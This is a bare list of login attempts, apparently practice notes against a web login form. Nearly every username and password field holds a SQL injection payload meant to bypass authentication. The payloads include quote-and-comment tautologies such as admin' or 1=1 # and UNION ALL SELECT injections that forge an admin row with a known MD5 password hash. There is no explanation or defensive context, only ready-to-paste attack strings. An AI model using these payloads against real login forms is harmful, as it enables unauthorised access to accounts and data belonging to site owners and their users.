User Name:admin' or 1=1 #
Password:asdasd
User Name:admin" or 1=1 #
Password:asdasd
User Name:admin' or 1=1 #
Password:asd
User Name:dumb
Password:dumb
User Name:admin" or "1"="1
Password:admin" or "1"="1
User Name:1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 #
Password:1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 #
User Name:1234 " AND 1=0 UNION ALL SELECT "admin" #, "81dc9bdb52d04dc20036dbd8313ed055 #
Password:1234 " AND 1=0 UNION ALL SELECT "admin" #, "81dc9bdb52d04dc20036dbd8313ed055
